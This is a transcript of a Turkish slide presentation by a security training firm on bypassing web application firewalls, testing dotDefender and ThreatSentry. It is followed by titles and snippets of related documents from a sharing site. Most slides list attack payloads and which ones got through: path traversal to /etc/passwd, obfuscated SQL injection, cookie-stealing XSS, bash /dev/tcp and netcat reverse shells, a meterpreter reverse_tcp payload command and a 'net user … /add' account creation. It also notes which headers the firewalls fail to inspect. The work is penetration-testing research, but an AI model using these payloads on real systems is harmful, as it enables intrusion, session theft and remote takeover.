(W)eb (A)pplication (F)irewall Bypass

Ebat: px
Şu sayfadan göstermeyi başlat:

Download "(W)eb (A)pplication (F)irewall Bypass http://www.bga.com.tr bilgi@bga.com.tr"

Transkript

1 (W)eb (A)pplication (F)irewall Bypass

2 Hakkımda Mehmet Dursun İnce ) Penetration Vuln.

3 WAF Nedir? WAF nedir? Pentester WAF + Web Sunucusu Veri Tabanı Sistemi

4 SQLi XSS LFI RCE Command Injection Code Execution Testler Otomatize Tool lar ve WAF.

5 DMZ dotdefender CentOS 5.x MySQL Centos 5.x Pentester ModSecurity CentOS 5.x ThreadSentry Windows Server 2003 Sql Server 2008 Windows Server 2008

6 Payloads # File Inclusion../..%2F passwd../config.php..%2fconfig.php /etc/passwd../../../../../../../../../etc/passwd..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc..% 2Fpasswd php://filter/read=convert.base64- encode/resource=[file]

7 Payloads # SQL Injection a ' and '3'='3 ) and ('1')=('1 or 1=1 and 1=1 and 2>=1 and >=1920

8 Payloads # MySQL Injection and and substring(version(),1,1)>0 and SubsTRing(version(),1,1)>0 union select 192,282,333 And sleep(5) union+select+null%2cnull%2cload_file('lfi.php' )-- /*!UniOn*/%20/*!SElecT*/+192,282,333-- %23PTTmJopxdWJ%0AUNION%23PTTmJopxdWJ% 0ASeLEcT+null,null,version()--

9 Payloads # MsSQL Injection AND > 1 %03AND%0CUNICODE%03(%03SUBSTRING%03( 31 RVERNAME-- IF(BINARY_CHECKSUM(7399)=BINARY_CHECKSU M(7399)) WAITFOR DELAY '0:0:5';

10 Payloads # XSS <script> <script></script> javascript alert(1) prompt(1) alert(/bga/) document.cookie <img srx=x:x onerror=prompt(document.cookie)//> <link rel=stylesheet href=data:,*%7bx:expression(write(1))%7d

11 Payloads # XSS <input onfocus=write(1) autofocus> <video onerror="javascript:alert(1)"><source></source></video> <body oninput=alert(1)><input autofocus> <frameset onload=alert(1)> <object data="data:text/html;base64,phnjcmlwdd5hbgvydcgxkt wvc2nyaxb0pg=="></object> <embed src="data:text/html;base64,phnjcmlwdd5hbgvydcgxktwv c2nyaxb0pg=="></embed> <script>({})[$='\143\157\156\163\164\162\165\143\164\1 57\162'][$]('\141\154\145\162\164\50document.cookie\5 1')()</script>

12 Payloads # Command Injection ; cat /etc/passwd ; echo selam > a ; cat../config.php && echo selam > a && cat../config.php ; wget /mince.txt

13 Payloads # Command Injection && telnet /bin/bash telnet telnet && mknod backpipe p && nc <backpipe /bin/bash 1>backpipe && /bin/bash -i > /dev/tcp/ /4444 0<&1 2>&1

14 Payloads # Code Execution./msfpayload php/meterpreter/reverse_tcp LHOST= LPORT=443 R./msfencode -e php/base64 -t raw

15 Applicure dotdefender «dotdefender is the perfect choice for protecting your website and web applications today.»

16 Applicure dotdefender Test Ortamı: CentOS 5.8 i386 sanal makine CentOS Full update Lisanslı dotdefender ve full update!

17 Applicure dotdefender File Inclusion Input :../config.php

18 Applicure dotdefender File Inclusion Input : /etc/passwd

19 Applicure dotdefender File Inclusion Input :../../../../../../../../../etc/passwd WAF detected!

20 Applicure dotdefender File Inclusion Saldırıyı engelleyen kural.

21 Applicure dotdefender File Inclusion Input : php://filter/read=convert.base64- encode/resource=/etc/passwd WAF trigger edilmedi

22 Applicure dotdefender SQL Injection a ' and '3'='3 ( and ('1')=('1 or 1=1 and 1=1 and 2>=1 and >=1920 Yeşil olan payload lar WAF tarafından engellenmeyen talepleri ifade etmektedir!

23 Applicure dotdefender MySQL Injection and and substring(version(),1,1)>0 and SubsTRing(version(),1,1)>0 union select 1,2,3-- union select 192,282,333 And sleep(5) union+select+null%2cnull%2cload_file('lfi.php ')-- /*!UniOn*/%20/*!SElecT*/+192,282,333-- %23PTTmJopxdWJ%0AUNION%23PTTmJopxdWJ %0ASeLEcT+3,null,version()

24 Applicure dotdefender MsSQL Injection AND > 1 %03AND%0CUNICODE%03(%03SUBSTRING%0 3>%031 %0DUNION%0DALL%0DSELECT%0DNULL,NUL IF(BINARY_CHECKSUM(7399)=BINARY_CHECK SUM(7399)) WAITFOR DELAY '0:0:5';

25 Applicure dotdefender MsSQL Injection Input WIN-UYB0EA2LDB6

26 Applicure dotdefender XSS Input = <script> Waf Blocked!

27 Applicure dotdefender XSS Input = alert() Waf Blocked! Input = prompt()

28 Applicure dotdefender XSS Input = <img src=bga onerror=prompt(document.cookie)//>

29 Applicure dotdefender XSS <img src=x:x onerror=prompt(document.cookie)//> <link rel=stylesheet href=data:,*%7bx:expression(write(1))%7d <input onfocus=write(1) autofocus> <video onerror="javascript:alert(1)"><source></sourc e></video> <body oninput=prompt(1)><input autofocus> <frameset onload=prompt(1)>

30 Applicure dotdefender XSS <object data="data:text/html;base64,phnjcmlwdd5hb GVydCgxKTwvc2NyaXB0Pg=="></object> <embed src="data:text/html;base64,phnjcmlwdd5hbg VydCgxKTwvc2NyaXB0Pg=="></embed> ({})[$='\143\157\156\163\164\162\165\143\ 164\157\162'][$]('\141\154\145\162\164\50 document.cookie\51')()

31 Applicure dotdefender Command Inj. Input = ; cat /etc/passwd

32 Applicure dotdefender Command Inj. Input = && /bin/bash -i > /dev/tcp/ /4545 0<&1 2>&1 WAF bypass!

33 Applicure dotdefender Command Inj ; cat /etc/passwd ; echo selam > a ; cat../config.php && echo selam > a && cat../config.php ; wget /mince.txt && telnet /bin/bash telnet telnet && mknod backpipe p && nc <backpipe /bin/bash 1>backpipe && /bin/bash -i > /dev/tcp/ /8888 0<&1 2>&1

34 App. dotdefender HTTP Header HTTP Header ile gönderilen bilgilerin WAF tarafından incelenip incelenmediği test edilmiştir. User-Agent Cookie

35 App. dotdefender HTTP Header XSS User-Agent i boş olan talepleri, dotdefender saldırı olarak algılamaktadır.

36 App. dotdefender HTTP Header XSS Cookie değişkeni dotdefender tarafından takip edilmemektedir!

37 App. dotdefender Cookie SQL Inj. dotdefender Cookie değişkeni üzerinde bir inceleme yapmamaktadır. Bu nedenle cookie üzerinden SQL Injection saldırıları kolaylıkla gerçekleştirilebilir.

38 App. dotdefender Web Scanners Default kurulumda Saniyede 200 talebi aşan ip leri 10 dakikalığına banlanmaktadır.

39 App. dotdefender Netsparker Acunetix tüm zafiyetleri başarı ile tespit etmiştir.

40 App. dotdefender Acunetix Netsparker mssql.php üzerinde bulunan MsSQL Injection zafiyeti haricinde ki tüm zafiyetleri başarı ile tespit edebilmiştir.

41 Web Application Firewall & Intrusion Prevention Software for IIS ThreatSentry ntion.html

42 ThreatSentry Test Ortamı: Windows Server bit sanal makine Full Windows update Tüm özellikleri aktif, 30 günlük test sürümü.

43 ThreatSentry File Inclusion Input :../config.php

44 ThreatSentry File Inclusion Input :../../../../../../../../../ WAF tespit edemedi.

45 ThreatSentry File Inclusion Input : php://filter/read=convert.base64- encode/resource=/etc/passwd WAF blocked!

46 ThreatSentry SQL Injection a ' and '3'='3 ( and ('1')=('1 or 1=1 and 1=1 and 2>=1 and >=1920 Yeşil olan payload lar WAF tarafından engellenmeyen talepleri ifade etmektedir!

47 ThreatSentry MySQL Injection and and substring(version(),1,1)>0 and SubsTRing(version(),1,1)>0 union select 1,2,3-- And sleep(5) union+select+null%2cnull%2cload_file('lfi. php')-- /*!UniOn*/%20/*!SElecT*/+192,282,333 %23PTTmJopxdWJ%0AUNION%23PTTmJopxd WJ%0ASeLEcT+3,null,version()

48 ThreatSentry MsSQL Injection AND UNICODE(SUBSTRING(DB_NAME(),1,1)) > 1 %03AND%0CUNICODE%03(%03SUBSTRING%0 3(%03DB_NAME()%03,%031,1%03))%03>%03 1 %0DUNION%0DALL%0DSELECT%0DNULL,NUL L,DB_NAME() IF(BINARY_CHECKSUM(7399)=BINARY_CHECK SUM(7399)) WAITFOR DELAY '0:0:5';

49 ThreatSentry MsSQL Injection Input = UNION%0DALL%0DSELECT%0DNULL,NULL,DB _NAME() waftest

50 ThreatSentry XSS Input = <script> Waf Blocked!

51 ThreatSentry XSS Input = <img src=x:x onerror=prompt(document.cookie)//>

52 ThreatSentry XSS A Input = <body oninput=prompt(document.cookie)><input autofocus>

53 ThreatSentry XSS <img src=x:x onerror=prompt(document.cookie)//> <link rel=stylesheet href=data:,*%7bx:expression(write(1))%7d <input onfocus=write(1) autofocus> <video onerror="javascript:alert(1)"><source></sourc e></video> <body oninput=prompt(1)><input autofocus> <frameset onload=prompt(1)>

54 ThreatSentry XSS <object data="data:text/html;base64,phnjcmlwdd5hb GVydCgxKTwvc2NyaXB0Pg=="></object> <embed src="data:text/html;base64,phnjcmlwdd5hbg VydCgxKTwvc2NyaXB0Pg=="></embed> ({})[$='\143\157\156\163\164\162\165\143\ 164\157\162'][$]('\141\154\145\162\164\50 document.cookie\51')()

55 ThreatSentry Command Inj. Cmd.exe /C dir nc.exe net user mince M1nc3 /add

56 ThreatSentry HTTP Header XSS User-Agent değişkeni ThreatSentry tarafından takip edilmemektedir!

57 ThreatSentry Netsparker Netsparker tüm zafiyetleri başarı ile tespit etmiştir.

58 ThreatSentry Acunetix Acunetix tüm zafiyetleri başarı ile tespit etmiştir.

59 Örnek Uygulama - 1

60 HTTP PARAMETER POLLUTION

61 Örnek Uygulama - 2

62 Teşekkürler

Web Uygulama Pentest Eğitimi

Web Uygulama Pentest Eğitimi Web Uygulama Pentest Eğitimi Konu: Girdi Denetimi @2014 Örnek Eğitim Notu bilgi@bga.com.tr Girdi Denetimi Uygulama kullanmadan önce bütün güvensiz verilerin doğru bir şekilde denetlenmesidir. Bir çok saldırı

Detaylı

Tanımı 46 2-4-6 Problemi 46 Şüpheci Yaklaşım 47 Tamsayı Taşması (Integer Overflow) 47 Tamsayı Taşması Java Uygulaması 48

Tanımı 46 2-4-6 Problemi 46 Şüpheci Yaklaşım 47 Tamsayı Taşması (Integer Overflow) 47 Tamsayı Taşması Java Uygulaması 48 1 Yazılım Güvenliği 2 Yazılım Güvenliği Olgunluk Modelleri 4 OpenSAMM 6 Tehdit Modelleme 7 Güvenli Kod Denetimi 8 Statik Kod Analizi 9 Sızma Testleri-Pentest 10 13 Ne Kadar Karmaşık Olabilir ki? 14 HTML

Detaylı

[ Web Uygulamalarında Kayank Kod Analizi II ] [ Mehmet Dursun INCE < mehmet.ince@intelrad.com > ] [ 10 Haziran 2013 ]

[ Web Uygulamalarında Kayank Kod Analizi II ] [ Mehmet Dursun INCE < mehmet.ince@intelrad.com > ] [ 10 Haziran 2013 ] [ Web Uygulamalarında Kayank Kod Analizi II ] [ Mehmet Dursun INCE < mehmet.ince@intelrad.com > ] [ 10 Haziran 2013 ] 1 GİRİŞ Bu döküman Web Uygulamalarında Kaynak Kod Analizi isimli yazı serisinin 2.

Detaylı

Deniz Çevik deniz.cevik@biznet.com.tr. WAF Sistemlerini ve Uygulama Filtrelerini Atlatma Teknikleri

Deniz Çevik deniz.cevik@biznet.com.tr. WAF Sistemlerini ve Uygulama Filtrelerini Atlatma Teknikleri Deniz Çevik deniz.cevik@biznet.com.tr WAF Sistemlerini ve Uygulama Filtrelerini Atlatma Teknikleri Web Application Firewall (WAF) sistemleri ; web uygulamalarını uygulama geliştiricilerden bağımsız olarak

Detaylı

VERİ GÜVENLİĞİ. Web Uygulamaları Güvenliği. Özer Çelik Matematik-Bilgisayar Bölümü

VERİ GÜVENLİĞİ. Web Uygulamaları Güvenliği. Özer Çelik Matematik-Bilgisayar Bölümü VERİ GÜVENLİĞİ Web Uygulamaları Güvenliği Özer Çelik Matematik-Bilgisayar Bölümü Http nedir? HTTP (İngilizce Hypertext Transfer Protocol, Türkçe Hiper Metin Transfer Protokolü) bir kaynaktan dağıtılan

Detaylı

Web Uygulama Saldırıları ve Klasik Çözümlerin Yetersizliği

Web Uygulama Saldırıları ve Klasik Çözümlerin Yetersizliği Web Uygulama Saldırıları ve Klasik Çözümlerin Yetersizliği Huzeyfe ÖNAL Bilgi Güvenliği AKADEMİSİ Huzeyfe.onal@bga.com.tr Web Uygulama Güvenliği Etkinliği / Ankara Huzeyfe ÖNAL Bilgi Güvenliği Danışmanı

Detaylı

KISIM I: HACKING B R ALAN OLARAK GÜVENL K

KISIM I: HACKING B R ALAN OLARAK GÜVENL K HACKING-icindekiler 5/20/10 12:06 AM Page vii Ç NDEK LER KISIM I: HACKING B R ALAN OLARAK GÜVENL K 3 TEHL KEN N FARKINDA MISINIZ? 5 HACKER, CRACKER vb. KAVRAMLARI 7 TAR HSEL SÜREÇ: HACKING 11 TC YASALARINDA

Detaylı

W3af ile Web Uygulama Güvenlik Testleri

W3af ile Web Uygulama Güvenlik Testleri W3af ile Web Uygulama Güvenlik Testleri Birkaç tıkla web sayfalarının, veritabanlarının hacklenebildiği, bir komutla kablosuz ağ şifrelerin kırıldığı günleri yaşıyoruz. Çok değil birkaç yıl öncesi sadece

Detaylı

[ Web Uygulama Güvenliği #101 ] Mehmet Ince mehmet.ince@bga.com.tr

[ Web Uygulama Güvenliği #101 ] Mehmet Ince mehmet.ince@bga.com.tr [ Web Uygulama Güvenliği #101 ] Mehmet Ince mehmet.ince@bga.com.tr BGA Bilgi Güvenliği Eğitim ve Danışmanlık Ltd. Şti bilgi@bga.com.tr www.bga.com.tr Sayfa 1 İçindekiler 1) HTTP... 3 a) SSL Nedir? HTTPS...

Detaylı

Web Uygulama Güvenliğinde Doğru Bilinen Yanlışlar!

Web Uygulama Güvenliğinde Doğru Bilinen Yanlışlar! Web Uygulama Güvenliğinde Doğru Bilinen Yanlışlar! Deniz Çevik Güvenlik Testleri Yöneticisi deniz.cevik@biznet.com.tr Gündem Kısaca Biznet Web Uygulama Mimarisine Kısa Bir Bakış Uygulama Güvenliği Sağlamada

Detaylı

WEB UYGULAMA GÜVENLİĞİ HAKKINDA. Mesut Güngör İzmir Yüksek Teknoloji Enstitüsü Bilgi İşlem Daire Başkanlığı

WEB UYGULAMA GÜVENLİĞİ HAKKINDA. Mesut Güngör İzmir Yüksek Teknoloji Enstitüsü Bilgi İşlem Daire Başkanlığı WEB UYGULAMA GÜVENLİĞİ HAKKINDA Mesut Güngör İzmir Yüksek Teknoloji Enstitüsü Bilgi İşlem Daire Başkanlığı İçindekiler Bilinen en popüler web uygulama atakları Güvenli yazılım geliştirme Prosedürler Bilinen

Detaylı

Veritabanı Sızma Testleri Türk Standardları Enstitüsü Yazılım Test ve Belgelendirme Dairesi Başkanlığı

Veritabanı Sızma Testleri Türk Standardları Enstitüsü Yazılım Test ve Belgelendirme Dairesi Başkanlığı Veritabanı Sızma Testleri Türk Standardları Enstitüsü Yazılım Test ve Belgelendirme Dairesi Başkanlığı Tarih 1 Veritabanı Sızma Testleri Veritabanı sistemleri kritik sistemlerdir. Testler sonucunda elde

Detaylı

Web Uygulamaları Güvenlik Denetimi. Fatih Özavcı

Web Uygulamaları Güvenlik Denetimi. Fatih Özavcı Web Uygulamaları Güvenlik Denetimi Fatih Özavcı Web Uygulamalarının Güvenlik Sorunları Web temelli yazılım geliştirme, hızlı ve sonuca yönelik yapılmaktadır; güvenlik kriterleri genelde göz ardı edilmektedir.

Detaylı

Güvenlik Sistemlerini Atlatma ve Alınacak Dersler. Huzeyfe ÖNAL honal@bga.com.tr www.bga.com.tr www.guvenlikegitimleri.com

Güvenlik Sistemlerini Atlatma ve Alınacak Dersler. Huzeyfe ÖNAL honal@bga.com.tr www.bga.com.tr www.guvenlikegitimleri.com Güvenlik Sistemlerini Atlatma ve Alınacak Dersler Huzeyfe ÖNAL honal@bga.com.tr www.bga.com.tr www.guvenlikegitimleri.com Huzeyfe ÖNAL Ağ güvenliği uzmanı Network pentest Alternatif ağ güvenliği sistemleri

Detaylı

Özgür Yazılımlar ile Statik ve Dinamik Kod Güvenliği Analizi Emre Evren Yalçın

Özgür Yazılımlar ile Statik ve Dinamik Kod Güvenliği Analizi Emre Evren Yalçın Özgür Yazılımlar ile Statik ve Dinamik Kod Güvenliği Analizi Emre Evren Yalçın $Whoami Web Developer @ İstanbul Kültür Üniversitesi BST Information Security Researcher @ Signalsec.com Ajanda Statik kod

Detaylı

Web Uygulamaları Güvenlik Denetimi. Fatih Özavcı

Web Uygulamaları Güvenlik Denetimi. Fatih Özavcı Web Uygulamaları Güvenlik Denetimi Fatih Özavcı Web Uygulamalarının Güvenlik Sorunları Web temelli yazılım geliştirme, hızlı ve sonuca yönelik yapılmaktadır; güvenlik kriterleri genelde göz ardı edilmektedir.

Detaylı

PHP ile Web Uygulama Güvenliği

PHP ile Web Uygulama Güvenliği PHP ile Web Uygulama Güvenliği Burak DAYIOĞLU - Burç YILDIRIM bd@dikey8.com by@dikey8.com http://www.dikey8.com Web de Güvenlik İhtiyacı Web e bağımlılığımız giderek artıyor Uygulamalar artan biçimde görev-kritik

Detaylı

Halil ÖZTÜRKCİ, MVP CISSP, CISA,GPEN,CEH,CHFI BT Güvenlik Hizmetleri Direktörü halil.ozturkci@adeo.com.tr

Halil ÖZTÜRKCİ, MVP CISSP, CISA,GPEN,CEH,CHFI BT Güvenlik Hizmetleri Direktörü halil.ozturkci@adeo.com.tr Halil ÖZTÜRKCİ, MVP CISSP, CISA,GPEN,CEH,CHFI BT Güvenlik Hizmetleri Direktörü halil.ozturkci@adeo.com.tr AnkaSec Organizasyon Kurulu Üyesi-İsim Babası Microsoft MVP, Enterprise Security Profesyonel Penetration

Detaylı

Dokuz Eylül Üniversitesi Bilgi İşlem Dairesi Sunum konusu: Web Güvenliği

Dokuz Eylül Üniversitesi Bilgi İşlem Dairesi Sunum konusu: Web Güvenliği Dokuz Eylül Üniversitesi Bilgi İşlem Dairesi Sunum konusu: Web Güvenliği Web Güvenliği Bugün Türkiye'de önemli kurumların bilgi güvenliği ile ilgili zayıflıkları bulunduğunu görüyoruz. Bilginin güvensiz

Detaylı

Web Güvenlik Tarayıcılarının Evrimi

Web Güvenlik Tarayıcılarının Evrimi Web Güvenlik Tarayıcılarının Evrimi Ferruh Mavituna, Aralık 2009, WGT E-Dergi 3. Sayı Web uygulaması güvenliğinin hava civa olduğu yıllarda, 2004'te Istanbul`da (R'87 - Web Application Security Solutions)

Detaylı

Kurumsal Ağlarda Log İnceleme Yöntemiyle Saldırı Analizi

Kurumsal Ağlarda Log İnceleme Yöntemiyle Saldırı Analizi Kurumsal Ağlarda Log İnceleme Yöntemiyle Saldırı Analizi Huzeyfe ÖNAL Bilgi Güvenliği AKADEMİSİ Siber Güvenlik Konferansı 14 / Istanbul Huzeyfe ÖNAL Bilgi Güvenliği Danışmanı & Ağ Güvenliği Araş

Detaylı

Kurumsal Ağlarda Kullanılan Güvenlik Sistemlerini Atlatma. Huzeyfe ÖNAL Bilgi Güvenliği AKADEMİSİ Huzeyfe.onal@bga.com.tr

Kurumsal Ağlarda Kullanılan Güvenlik Sistemlerini Atlatma. Huzeyfe ÖNAL Bilgi Güvenliği AKADEMİSİ Huzeyfe.onal@bga.com.tr Kurumsal Ağlarda Kullanılan Güvenlik Sistemlerini Atlatma Huzeyfe ÖNAL Bilgi AKADEMİSİ Huzeyfe.onal@bga.com.tr Turkey YAZ Huzeyfe ÖNAL Kurumsal Güvenlik Hizmetleri Yöneticisi BGA / Bilgi AKADEMİSİ Bilgi

Detaylı

Sızma Testlerinde Fiziksel Güvenlik Riskleri

Sızma Testlerinde Fiziksel Güvenlik Riskleri Sızma Testlerinde Fiziksel Güvenlik Riskleri Siber Güvenlik Konferansı 14 Harbiye / İstanbul Konuşmacı Hakkında Ozan UÇAR Kıdemli Bilgi Güvenliği Danışmanı Eğitmen BGA Bilgi Güvenliği AKADEMİSİ ozan.ucar@bga.com.tr

Detaylı

CSRF (XSRF, Cross Site Request Forgery Cross Site Reference Forgery ) Nedir? Nasıl Kullanılır? ve Nasıl Korunulur?

CSRF (XSRF, Cross Site Request Forgery Cross Site Reference Forgery ) Nedir? Nasıl Kullanılır? ve Nasıl Korunulur? CSRF (XSRF, Cross Site Request Forgery Cross Site Reference Forgery ) Nedir? Nasıl Kullanılır? ve Nasıl Korunulur? CSRF (XSRF, Cross Site Request Forgery Cross Site Reference Forgery ) Nedir? Başlamadan

Detaylı

Web Uygulama Güven(siz)liği 2.0

Web Uygulama Güven(siz)liği 2.0 Web Uygulama Güven(siz)liği 2.0 Huzeyfe ÖNAL Bilgi Güvenliği AKADEMİSİ http://www.bga.com.tr honal@bga.com.tr Güvenlik lüks değil, gereksinimdir! Ben Kimim? Kıdemli bilgi güvenliği uzmanı (İş hayatı) Ağ

Detaylı

WEB SUNUCU GÜVENLİĞİ: Web Siteleri Neden Hacklenir?

WEB SUNUCU GÜVENLİĞİ: Web Siteleri Neden Hacklenir? WEB SUNUCU GÜVENLİĞİ: Web Siteleri Neden Hacklenir? Gereksiz yedek dosyaları Default ayarlarla gelen konfigürasyon dosyaları Yetkisi tam olarak verilmiş dosyalar ya da dosya izni kontrolü yapılmadan sunucuda

Detaylı

Güvenlik Java ve Web Uygulama Güvenliği

Güvenlik Java ve Web Uygulama Güvenliği Güvenlik Java ve Web Uygulama Güvenliği Melih Sakarya www.melihsakarya.com melih.sakarya@gmail.com www.mergecons.com Olası Açıklar Donanımsal açıklar Sistemsel Açıklar Yazılımsal Açıklar Sosyal Mühendislik

Detaylı

Web 2.0 Güvenliği @2014 Örnek Eğitim Notu bilgi@bga.com.tr

Web 2.0 Güvenliği @2014 Örnek Eğitim Notu bilgi@bga.com.tr Web 2.0 Güvenliği @2014 Örnek Eğitim Notu bilgi@bga.com.tr Javascript 1995 Netscape, Brendan Eich tarafından geliştirildi. Dinamik olmasının yanında en önemli iki özelliği; Lambda Closure Javascript -

Detaylı

NOPcon Capture The Flag Çözümleri www.nopcon.org www.signalsec.com

NOPcon Capture The Flag Çözümleri www.nopcon.org www.signalsec.com NOPcon Capture The Flag Çözümleri www.nopcon.org www.signalsec.com 1. Adım Çözümü İlk adım gerçek hayatta karşılaşılmayacak, dikkat ölçme amacıyla hazırlanmış bir adımdı. Katılımcılardan verdiğimiz iki

Detaylı

CODEIGNITER SEMINERI KÜTÜPHANE YAZMA GÜVENLIK ÖNLEMLERI CODEIGNITER 2.0

CODEIGNITER SEMINERI KÜTÜPHANE YAZMA GÜVENLIK ÖNLEMLERI CODEIGNITER 2.0 CODEIGNITER SEMINERI KÜTÜPHANE YAZMA GÜVENLIK ÖNLEMLERI CODEIGNITER 2.0 Özgür Web Teknolojileri Günleri 2010 Yeditepe Üniversitesi, Airties Salonu 16 Ekim 2010 (14:00 14:45) Fatih BAZMAN (http://codeigniter.gen.tr)

Detaylı

Her Yönüyle SQL Enjeksiyonu. OWASP-Türkiye Bünyamin Demir

Her Yönüyle SQL Enjeksiyonu. OWASP-Türkiye Bünyamin Demir Her Yönüyle SQL Enjeksiyonu OWASP-Türkiye Bünyamin Demir Bünyamin Demir ( @bunyamindemir ) OWASP Türkiye Bölüm Lideri Founder & CTO @ Enforsec Ltd. Sızma Testleri Uzmanı Web, Mobil, Network, SCADA, Wireless,

Detaylı

İstemci Tabanlı Saldırı Türleri. Ozan UÇAR ozan.ucar@bga.com.tr

İstemci Tabanlı Saldırı Türleri. Ozan UÇAR ozan.ucar@bga.com.tr İstemci Tabanlı Saldırı Türleri Ozan UÇAR ozan.ucar@bga.com.tr Kayseri 2012 Konuşmacı Hakkında Kıdemli Bilgi Güvenliği Danışmanı ve Eğitmen Bilgi Güvenliği AKADEMİSİ () PenetraPon Tester Blog Yazarı blog.bga.com.tr

Detaylı

Bilgi Güvenliği Semineri

Bilgi Güvenliği Semineri Bilgi Güvenliği Semineri Kadir Has Universitesi Mühendislik Günleri '10 Etkinliği Bilgi Güvenliği Semineri Ozan UÇAR Certified Ethical Hacker mail@ozanucar.com Hacking Kültürü Hakkında Bilgisayar yeraltı

Detaylı

Firewall/IPS Güvenlik Testleri Eğitimi

Firewall/IPS Güvenlik Testleri Eğitimi 1 bilgisayarı (Laptop) Workstation,2GB ram Alacağınız güvenlik cihazını siz test etmek istemez misiniz? Eğitim Tanımı: FIPS Pentest eğitimi, günümüz bilgi güvenliği koruma katmanlarından Firewall/IPS/WAF

Detaylı

1.PROGRAMLAMAYA GİRİŞ

1.PROGRAMLAMAYA GİRİŞ 1.PROGRAMLAMAYA GİRİŞ Bilindiği gibi internet üzerindeki statik web sayfaları ziyaretçinin interaktif olarak web sayfasını kullanmasına olanak vermemektedir. Bu yüzden etkileşimli web sayfaları oluşturmak

Detaylı

İNTERNET PROGRAMCILIĞI DERSİ ÇALIŞMA SORULARI

İNTERNET PROGRAMCILIĞI DERSİ ÇALIŞMA SORULARI İNTERNET PROGRAMCILIĞI DERSİ ÇALIŞMA SORULARI 1) Aşağıdaki seçeneklerin hangisinde PHP kod yazımı doğru olarak verilmiştir? A) B) C).. D) 2) PHP ile hazırlanmış

Detaylı

Web Programlama Kursu

Web Programlama Kursu Web Programlama Kursu Bu kurs ne değildir? Neyi amaç edinmiştir? Bilgisayar Programcısı? Web Tasarımcısı? Web Programcısı? Neler öğreneceğiz? Kurs sonunda neler yapılabileceğiz? Örnek siteler Örnek Projeler

Detaylı

Bilgi Güvenliği Denetim Uzmanı

Bilgi Güvenliği Denetim Uzmanı Vodafone da Güvenli Web Uygulamaları Geliştirme Deneyimleri Huzeyfe Önal Bilgi Güvenliği Denetim Uzmanı huzeyfe.onal@vodafone.com http://www.lifeoverip.net Ajanda Geleneksel Güvenlik Yaklaşımı Neden Uygulama

Detaylı

Web Uygulama Açıklıkları ve Saldırı Engelleme Sistemleri Web uygulama açıklıkları karşısında saldırı engelleme sistemlerinin yetersizliği

Web Uygulama Açıklıkları ve Saldırı Engelleme Sistemleri Web uygulama açıklıkları karşısında saldırı engelleme sistemlerinin yetersizliği Web Uygulama Açıklıkları ve Saldırı Engelleme Sistemleri Web uygulama açıklıkları karşısında saldırı engelleme sistemlerinin yetersizliği Huzeyfe ÖNAL Bilgi Güvenliği AKADEMİSİ honal@bga.com.tr www.bga.com.tr

Detaylı

Disk Alanı 100 Mb 1 000 Mb 3 000 Mb 5 000 Mb 10 000 Mb 15 000 Mb. Aylık Trafik (Bandwidth) 1 Gb 5 Gb 10 Gb 15 Gb 25 Gb 35 Gb

Disk Alanı 100 Mb 1 000 Mb 3 000 Mb 5 000 Mb 10 000 Mb 15 000 Mb. Aylık Trafik (Bandwidth) 1 Gb 5 Gb 10 Gb 15 Gb 25 Gb 35 Gb WINDOWS HOSTING PAKETLERİ (Plesk Panel) ÖZELLİKLER Platform Özellikleri Disk Alanı 100 Mb 1 000 Mb 3 000 Mb 5 000 Mb 10 000 Mb 15 000 Mb Aylık Trafik (Bandwidth) 1 Gb 5 Gb 10 Gb 15 Gb 25 Gb 35 Gb Windows

Detaylı

MaestroPanel Kurulum

MaestroPanel Kurulum Kurulum 18.05.2013 ping@maestropanel.com www.maestropanel.com Sistem Gereksinimleri İşletim Sistemleri Windows Server 2008 R2 Windows Server 2012 Centos 5, 6 (Henüz Yayınlanmadı) Donanım 266 Mhz tek çekirdekli

Detaylı

1 / 5. Mehmet Alper Şen. Kıdemli Yazılım Uzmanı. İletişim Bilgileri

1 / 5. Mehmet Alper Şen. Kıdemli Yazılım Uzmanı. İletişim Bilgileri Mehmet Alper Şen E-Posta İletişim Bilgileri Adres Bilgileri : senworld@gmail.com alper@kodkurdu.com : Türkiye - Antalya - Merkez - Muratpaşa Ev Telefonu : 90 (242) 247 43 21 Cep Telefonu : 90 (555) 689

Detaylı

Web Uygulamarına Yönelik DoS DDoS Saldırıları ve Performans Testleri. Barkın Kılıç @barknkilic barkin@barkin.info

Web Uygulamarına Yönelik DoS DDoS Saldırıları ve Performans Testleri. Barkın Kılıç @barknkilic barkin@barkin.info Web Uygulamarına Yönelik DoS DDoS Saldırıları ve Performans Testleri Barkın Kılıç @barknkilic barkin@barkin.info localhost ~ $ id barkink Eski ve daimi sistem yöneticisi Linuxcu Pentester Eğitmen Aj(an)da

Detaylı

ZAFİYET TESPİTİ VE SIZMA YÖNTEMLERİ. Eyüp ÇELİK Bilgi Teknolojileri Güvenlik Uzmanı info@eyupcelik.com.tr http://www.eyupcelik.com.

ZAFİYET TESPİTİ VE SIZMA YÖNTEMLERİ. Eyüp ÇELİK Bilgi Teknolojileri Güvenlik Uzmanı info@eyupcelik.com.tr http://www.eyupcelik.com. ZAFİYET TESPİTİ VE SIZMA YÖNTEMLERİ Eyüp ÇELİK Bilgi Teknolojileri Güvenlik Uzmanı info@eyupcelik.com.tr http://www.eyupcelik.com.tr Eyüp ÇELİK Kimdir? Bilgi Güvenliği Uzmanı White Hat Hacker Ethical Hacking

Detaylı

Bu makalede 2003 sunucu, Windows 2003 Server anlamına gelmektedir. Aşağıda yapılan işlemler 2003 R2 sunucu üzerinde denenmiş ve çalıştırılmıştır.

Bu makalede 2003 sunucu, Windows 2003 Server anlamına gelmektedir. Aşağıda yapılan işlemler 2003 R2 sunucu üzerinde denenmiş ve çalıştırılmıştır. WINDOWS 2003 SUNUCULARI ÜZERĐNE PHP YÜKLENMESĐ ERDAL YAZICIOĞLU erdal(at)gmail.com http://barbarossa41.wordpress.com Merhabalar, Çözümpark.com adresinde bir kullanıcı ASP ve PHP yi aynı sunucu üzerinde

Detaylı

XSS Exploitation via CHEF

XSS Exploitation via CHEF XSS Exploitation via CHEF Evren Yalçın SignalSec Corp. www.signalsec.com GİRİŞ Xss zafiyetlerini exploit ederken genelde Beef(The Browser Exploitation Framework) aracı kullanılmaktadır. Fakat ek araçlar

Detaylı

Ders Tanıtım Sunumu. Internet Programming II. Elbistan Meslek Yüksek Okulu 2012 2013 Bahar Yarıyılı. 26 Şub. 2013 Öğr. Gör.

